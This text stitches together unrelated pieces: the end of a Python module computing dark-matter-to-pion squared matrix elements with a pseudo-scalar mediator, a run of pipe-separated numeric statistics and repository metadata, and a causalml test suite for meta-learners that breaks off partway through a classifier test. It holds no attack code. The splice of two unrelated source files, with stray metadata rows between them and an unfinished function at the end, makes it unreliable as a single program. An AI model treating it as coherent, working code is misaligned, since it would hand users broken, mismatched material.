        # parameter beta and the mediator width.
        mx = self.mx
        mp = self.mp
        gpxx = self.gpxx
        gpuu = self.gpuu
        gpdd = self.gpdd
        gpGG = self.gpGG
        beta = self.beta
        widthp = self.width_p
        # Final-state momenta: pi+, pi-, pi0 and the photon.
        p1 = momenta[0]
        p2 = momenta[1]
        p3 = momenta[2]
        k = momenta[3]
        # Total final-state four-momentum; the initial DM pair is
        # reconstructed back-to-back along the z-axis in this frame
        # (momentum layout appears to be [E, px, py, pz] — consistent
        # with how px/pxbar are built below).
        P = sum(momenta)
        pxmag = np.sqrt(P[0] ** 2 / 4.0 - mx ** 2)
        px = np.array([P[0] / 2.0, 0.0, 0.0, pxmag])
        pxbar = np.array([P[0] / 2.0, 0.0, 0.0, -pxmag])
        # NOTE(review): b0, fpi, vh, mdq, muq, mpi, mpi0, qe and MDot
        # (Minkowski dot product helper) come from module scope — not
        # visible in this chunk.
        # Order beta^0 contribution (CP-even limit).
        beta0 = -(
            gpxx ** 2
            * qe ** 2
            * (
                -(b0 * fpi * gpGG * mdq)
                + b0 * fpi * gpGG * muq
                - b0 * fpi * gpdd * vh
                + b0 * fpi * gpuu * vh
            )
            ** 2
            * (
                mpi ** 2 * MDot(k, p1) ** 2
                + mpi ** 2 * MDot(k, p2) ** 2
                - 2 * MDot(k, p1) * MDot(k, p2) * MDot(p1, p2)
            )
            * (mx ** 2 + MDot(px, pxbar))
        ) / (
            9.0
            * fpi ** 4
            * vh ** 2
            * MDot(k, p1) ** 2
            * MDot(k, p2) ** 2
            * (
                # Breit-Wigner-like denominator of the mediator propagator.
                (-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
                + mp ** 2 * widthp ** 2
                - 4
                * (
                    mp ** 2
                    - 2 * mpi ** 2
                    - mpi0 ** 2
                    - MDot(k, p1)
                    - MDot(k, p2)
                    - MDot(k, p3)
                    - MDot(p1, p2)
                    - MDot(p1, p3)
                    - MDot(p2, p3)
                )
                * (
                    MDot(k, p1)
                    + MDot(k, p2)
                    + MDot(k, p3)
                    + MDot(p1, p2)
                    + MDot(p1, p3)
                    + MDot(p2, p3)
                )
            )
        )
        # Order beta^1 contribution (linear in the CP-mixing parameter).
        beta1 = (
            -2
            * beta
            * gpxx ** 2
            * qe ** 2
            * (
                -(b0 * fpi * gpGG * mdq)
                + b0 * fpi * gpGG * muq
                - b0 * fpi * gpdd * vh
                + b0 * fpi * gpuu * vh
            )
            * (
                mpi ** 2 * MDot(k, p1) ** 2
                + mpi ** 2 * MDot(k, p2) ** 2
                - 2 * MDot(k, p1) * MDot(k, p2) * MDot(p1, p2)
            )
            * (
                b0 * mdq * vh
                + 2 * mpi ** 2 * vh
                - 2 * mpi0 ** 2 * vh
                + b0 * muq * vh
                + 4 * vh * MDot(k, p1)
                + 4 * vh * MDot(k, p2)
                - 2 * vh * MDot(k, p3)
                + 4 * vh * MDot(p1, p2)
                - 2 * vh * MDot(p1, p3)
                - 2 * vh * MDot(p2, p3)
            )
            * (mx ** 2 + MDot(px, pxbar))
        ) / (
            9.0
            * fpi ** 4
            * vh ** 2
            * MDot(k, p1) ** 2
            * MDot(k, p2) ** 2
            * (
                (-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
                + mp ** 2 * widthp ** 2
                - 4
                * (
                    mp ** 2
                    - 2 * mpi ** 2
                    - mpi0 ** 2
                    - MDot(k, p1)
                    - MDot(k, p2)
                    - MDot(k, p3)
                    - MDot(p1, p2)
                    - MDot(p1, p3)
                    - MDot(p2, p3)
                )
                * (
                    MDot(k, p1)
                    + MDot(k, p2)
                    + MDot(k, p3)
                    + MDot(p1, p2)
                    + MDot(p1, p3)
                    + MDot(p2, p3)
                )
            )
        )
        # Order beta^2 contribution (quadratic in the CP-mixing parameter).
        beta2 = (
            beta ** 2
            * gpxx ** 2
            * qe ** 2
            * (
                mpi ** 2 * MDot(k, p1) ** 2
                + mpi ** 2 * MDot(k, p2) ** 2
                - 2 * MDot(k, p1) * MDot(k, p2) * MDot(p1, p2)
            )
            * (
                -2
                * (
                    2 * b0 * fpi * gpGG * mdq
                    - 2 * b0 * fpi * gpGG * muq
                    + 2 * b0 * fpi * gpdd * vh
                    - 2 * b0 * fpi * gpuu * vh
                )
                * (
                    -(b0 * fpi * gpGG * mdq)
                    + b0 * fpi * gpGG * muq
                    - b0 * fpi * gpdd * vh
                    + b0 * fpi * gpuu * vh
                )
                + (
                    -(b0 * fpi * gpGG * mdq)
                    + b0 * fpi * gpGG * muq
                    - b0 * fpi * gpdd * vh
                    + b0 * fpi * gpuu * vh
                )
                ** 2
                - (
                    b0 * mdq * vh
                    + 2 * mpi ** 2 * vh
                    - 2 * mpi0 ** 2 * vh
                    + b0 * muq * vh
                    + 4 * vh * MDot(k, p1)
                    + 4 * vh * MDot(k, p2)
                    - 2 * vh * MDot(k, p3)
                    + 4 * vh * MDot(p1, p2)
                    - 2 * vh * MDot(p1, p3)
                    - 2 * vh * MDot(p2, p3)
                )
                ** 2
            )
            * (mx ** 2 + MDot(px, pxbar))
        ) / (
            9.0
            * fpi ** 4
            * vh ** 2
            * MDot(k, p1) ** 2
            * MDot(k, p2) ** 2
            * (
                (-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
                + mp ** 2 * widthp ** 2
                - 4
                * (
                    mp ** 2
                    - 2 * mpi ** 2
                    - mpi0 ** 2
                    - MDot(k, p1)
                    - MDot(k, p2)
                    - MDot(k, p3)
                    - MDot(p1, p2)
                    - MDot(p1, p3)
                    - MDot(p2, p3)
                )
                * (
                    MDot(k, p1)
                    + MDot(k, p2)
                    + MDot(k, p3)
                    + MDot(p1, p2)
                    + MDot(p1, p3)
                    + MDot(p2, p3)
                )
            )
        )
        # Sum of the beta-expansion orders.
        return beta0 + beta1 + beta2
    def msqrd_xx_to_p_to_000(self, momenta):
        """
        Returns the squared matrix element for dark matter annihilating into
        three neutral pions through a pseudo-scalar mediator. This function is
        used for RAMBO.
        Parameters
        ----------
        momenta : numpy.array
            List of momenta of the final state particles, the three neutral
            pions.
        self : PseudoScalarMediatorParameters or PseudoScalarMediator object
            Parameter object for the pseudo-scalar mediator theory.
        Returns
        -------
        msqrd : float
            The squared matrix element for a given set of momenta.
        """
        # Model parameters: DM mass, mediator mass, couplings, CP-mixing
        # parameter beta and the mediator width.
        mx = self.mx
        mp = self.mp
        gpxx = self.gpxx
        gpuu = self.gpuu
        gpdd = self.gpdd
        gpGG = self.gpGG
        beta = self.beta
        widthp = self.width_p
        # Final-state momenta of the three neutral pions.
        p1 = momenta[0]
        p2 = momenta[1]
        p3 = momenta[2]
        # Total final-state four-momentum; the initial DM pair is
        # reconstructed back-to-back along the z-axis in this frame.
        P = sum(momenta)
        pxmag = np.sqrt(P[0] ** 2 / 4.0 - mx ** 2)
        px = np.array([P[0] / 2.0, 0.0, 0.0, pxmag])
        pxbar = np.array([P[0] / 2.0, 0.0, 0.0, -pxmag])
        # NOTE(review): b0, fpi, vh, mdq, muq, mpi0 and MDot (Minkowski
        # dot product helper) come from module scope — not visible here.
        # Order beta^0 contribution (CP-even limit).
        beta0 = (
            b0 ** 2
            * gpxx ** 2
            * (fpi * gpGG * mdq - fpi * gpGG * muq + fpi * gpdd * vh - fpi * gpuu * vh)
            ** 2
            * (mx ** 2 + MDot(px, pxbar))
        ) / (
            fpi ** 4
            * vh ** 2
            * (
                # Breit-Wigner-like denominator of the mediator propagator.
                (mp ** 2 - 3 * mpi0 ** 2) ** 2
                + mp ** 2 * widthp ** 2
                - 4
                * (mp ** 2 - 3 * mpi0 ** 2 - MDot(p1, p2) - MDot(p1, p3) - MDot(p2, p3))
                * (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
            )
        )
        # Order beta^1 contribution (linear in the CP-mixing parameter).
        beta1 = (
            -2
            * b0 ** 2
            * beta
            * gpxx ** 2
            * (fpi * gpGG * mdq - fpi * gpGG * muq + fpi * gpdd * vh - fpi * gpuu * vh)
            * (mdq * vh + muq * vh)
            * (mx ** 2 + MDot(px, pxbar))
        ) / (
            fpi ** 4
            * vh ** 2
            * (
                (mp ** 2 - 3 * mpi0 ** 2) ** 2
                + mp ** 2 * widthp ** 2
                - 4
                * (mp ** 2 - 3 * mpi0 ** 2 - MDot(p1, p2) - MDot(p1, p3) - MDot(p2, p3))
                * (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
            )
        )
        # Order beta^2 contribution (quadratic in the CP-mixing parameter).
        beta2 = (
            b0 ** 2
            * beta ** 2
            * gpxx ** 2
            * (
                -3
                * (
                    fpi * gpGG * mdq
                    - fpi * gpGG * muq
                    + fpi * gpdd * vh
                    - fpi * gpuu * vh
                )
                ** 2
                + 2
                * (
                    fpi * gpGG * mdq
                    - fpi * gpGG * muq
                    + fpi * gpdd * vh
                    - fpi * gpuu * vh
                )
                * (
                    -4 * fpi * gpGG * mdq
                    + 4 * fpi * gpGG * muq
                    - 4 * fpi * gpdd * vh
                    + 4 * fpi * gpuu * vh
                )
                + (-(mdq * vh) - muq * vh) ** 2
            )
            * (mx ** 2 + MDot(px, pxbar))
        ) / (
            fpi ** 4
            * vh ** 2
            * (
                (mp ** 2 - 3 * mpi0 ** 2) ** 2
                + mp ** 2 * widthp ** 2
                - 4
                * (mp ** 2 - 3 * mpi0 ** 2 - MDot(p1, p2) - MDot(p1, p3) - MDot(p2, p3))
                * (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
            )
        )
        # Sum of the beta-expansion orders.
        msqrd = beta0 + beta1 + beta2
        return msqrd
| 29.824953
| 88
| 0.309191
| 1,601
| 16,016
| 3.073704
| 0.073704
| 0.057305
| 0.040642
| 0.043894
| 0.888844
| 0.880919
| 0.871774
| 0.855314
| 0.855314
| 0.855314
| 0
| 0.087688
| 0.573489
| 16,016
| 536
| 89
| 29.880597
| 0.632704
| 0.111701
| 0
| 0.828829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006757
| false
| 0
| 0.015766
| 0
| 0.031532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4dc6eb289c66675b7794288a953e6bdd0abc9d87
| 27,641
|
py
|
Python
|
tests/test_meta_learners.py
|
lleiou/causalml
|
2d3cacacad5ed3b0e57b593803a33c61c554f3b2
|
[
"Apache-2.0"
] | 1
|
2021-03-22T20:09:18.000Z
|
2021-03-22T20:09:18.000Z
|
tests/test_meta_learners.py
|
lleiou/causalml
|
2d3cacacad5ed3b0e57b593803a33c61c554f3b2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_meta_learners.py
|
lleiou/causalml
|
2d3cacacad5ed3b0e57b593803a33c61c554f3b2
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from xgboost import XGBRegressor
from xgboost import XGBClassifier
from causalml.dataset import synthetic_data
from causalml.inference.meta import BaseSLearner, BaseSRegressor, BaseSClassifier, LRSRegressor
from causalml.inference.meta import BaseTLearner, BaseTRegressor, BaseTClassifier, XGBTRegressor, MLPTRegressor
from causalml.inference.meta import BaseXLearner, BaseXClassifier, BaseXRegressor
from causalml.inference.meta import BaseRLearner, BaseRClassifier, BaseRRegressor
from causalml.inference.meta import TMLELearner
from causalml.inference.meta import BaseDRLearner
from causalml.metrics import ape, get_cumgain
from .const import RANDOM_SEED, N_SAMPLE, ERROR_THRESHOLD, CONTROL_NAME, CONVERSION
def test_synthetic_data():
    """Every simulation mode returns arrays aligned on the sample axis.

    The original test repeated the same three-line assertion block four
    times; a loop over the modes is equivalent and easier to extend.
    """
    for mode in (1, 2, 3, 4):
        y, X, treatment, tau, b, e = synthetic_data(mode=mode, n=N_SAMPLE, p=8, sigma=.1)
        n_rows = y.shape[0]
        # every returned array must have one entry per generated sample
        assert all(arr.shape[0] == n_rows for arr in (X, treatment, tau, b, e))
def test_BaseSLearner(generate_regression_data):
    """S-learner with an OLS base model recovers the true ATE within tolerance."""
    y, X, treatment, tau, b, e = generate_regression_data()

    slearner = BaseSLearner(learner=LinearRegression())

    # The point estimate must sit inside its own CI and close to the true ATE.
    ate_est, lower, upper = slearner.estimate_ate(X=X, treatment=treatment, y=y, return_ci=True)
    assert lower <= ate_est <= upper
    assert ape(tau.mean(), ate_est) < ERROR_THRESHOLD
def test_BaseSRegressor(generate_regression_data):
    """S-learner regressor: ATE accuracy plus AUUC sanity check of the CATE ranking."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseSRegressor(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: the ground-truth effect used to be stored under the key
    # 'treatment_effect_col' while get_cumgain was told to look for 'tau',
    # so the ground truth was silently ignored. Store it as 'tau' to match
    # the treatment_effect_col argument below.
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_LRSRegressor(generate_regression_data):
    """Linear-regression S-learner recovers the true ATE within tolerance."""
    y, X, treatment, tau, b, e = generate_regression_data()

    lr_learner = LRSRegressor()

    # The point estimate must sit inside its own CI and close to the true ATE.
    ate_est, lower, upper = lr_learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert lower <= ate_est <= upper
    assert ape(tau.mean(), ate_est) < ERROR_THRESHOLD
def test_BaseTLearner(generate_regression_data):
    """T-learner: ATE accuracy plus AUUC sanity check of the CATE ranking."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseTLearner(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseTRegressor(generate_regression_data):
    """T-learner regressor: ATE accuracy plus AUUC sanity check of the CATE ranking."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseTRegressor(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_MLPTRegressor(generate_regression_data):
    """MLP T-learner: ATE accuracy plus AUUC sanity check of the CATE ranking."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = MLPTRegressor()

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_XGBTRegressor(generate_regression_data):
    """XGB T-learner: ATE accuracy plus AUUC sanity check of the CATE ranking."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = XGBTRegressor()

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXLearner(generate_regression_data):
    """X-learner with known propensity: ATE accuracy plus AUUC sanity check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseXLearner(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXRegressor(generate_regression_data):
    """X-learner regressor with known propensity: ATE accuracy plus AUUC check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseXRegressor(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXLearner_without_p(generate_regression_data):
    """X-learner estimating its own propensity: ATE accuracy plus AUUC check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseXLearner(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXRegressor_without_p(generate_regression_data):
    """X-learner regressor estimating its own propensity: ATE and AUUC checks."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseXRegressor(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRLearner(generate_regression_data):
    """R-learner with known propensity: ATE accuracy plus AUUC sanity check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseRLearner(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRRegressor(generate_regression_data):
    """R-learner regressor with known propensity: ATE accuracy plus AUUC check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseRRegressor(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRLearner_without_p(generate_regression_data):
    """R-learner estimating its own propensity: ATE accuracy plus AUUC check."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseRLearner(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRRegressor_without_p(generate_regression_data):
    """R-learner regressor estimating its own propensity: ATE and AUUC checks."""
    y, X, treatment, tau, b, e = generate_regression_data()

    learner = BaseRRegressor(learner=XGBRegressor())

    # check the accuracy of the ATE estimation
    ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
    assert (ate_p >= lb) and (ate_p <= ub)
    assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD

    # check the accuracy of the CATE estimation with the bootstrap CI
    cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)

    # BUG FIX: store the ground-truth effect under 'tau' so it matches the
    # treatment_effect_col='tau' argument (previously the key was
    # 'treatment_effect_col' and the ground truth was silently ignored).
    auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
                                 'W': treatment,
                                 'y': y,
                                 'tau': tau})

    cumgain = get_cumgain(auuc_metrics,
                          outcome_col='y',
                          treatment_col='W',
                          treatment_effect_col='tau')

    # Check if the cumulative gain when using the model's prediction is
    # higher than it would be under random targeting
    assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_TMLELearner(generate_regression_data):
    """TMLE learner recovers the true ATE within tolerance given the propensity."""
    y, X, treatment, tau, b, e = generate_regression_data()

    tmle = TMLELearner(learner=XGBRegressor())

    # The point estimate must sit inside its own CI and close to the true ATE.
    ate_est, lower, upper = tmle.estimate_ate(X=X, p=e, treatment=treatment, y=y)
    assert lower <= ate_est <= upper
    assert ape(tau.mean(), ate_est) < ERROR_THRESHOLD
def test_BaseSClassifier(generate_classification_data):
    """S-learner classifier beats random targeting on held-out cumulative gain."""
    np.random.seed(RANDOM_SEED)

    df, x_names = generate_classification_data()

    # Binarize the treatment indicator: control -> 0, treated -> 1.
    df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)

    df_train, df_test = train_test_split(df,
                                         test_size=0.2,
                                         random_state=RANDOM_SEED)

    model = BaseSClassifier(learner=XGBClassifier())
    model.fit(
        X=df_train[x_names].values,
        treatment=df_train['treatment_group_key'].values,
        y=df_train[CONVERSION].values,
    )
    tau_pred = model.predict(
        X=df_test[x_names].values,
        treatment=df_test['treatment_group_key'].values,
    )

    auuc_metrics = pd.DataFrame(
        {
            'tau_pred': tau_pred.flatten(),
            'W': df_test['treatment_group_key'].values,
            CONVERSION: df_test[CONVERSION].values,
            'treatment_effect_col': df_test['treatment_effect'].values,
        }
    )
    cumgain = get_cumgain(
        auuc_metrics,
        outcome_col=CONVERSION,
        treatment_col='W',
        treatment_effect_col='treatment_effect_col',
    )

    # The model's ranking should accumulate more gain than random targeting.
    assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_BaseTClassifier(generate_classification_data):
    """T-learner classifier beats random targeting on held-out cumulative gain."""
    np.random.seed(RANDOM_SEED)

    df, x_names = generate_classification_data()

    # Binarize the treatment indicator: control -> 0, treated -> 1.
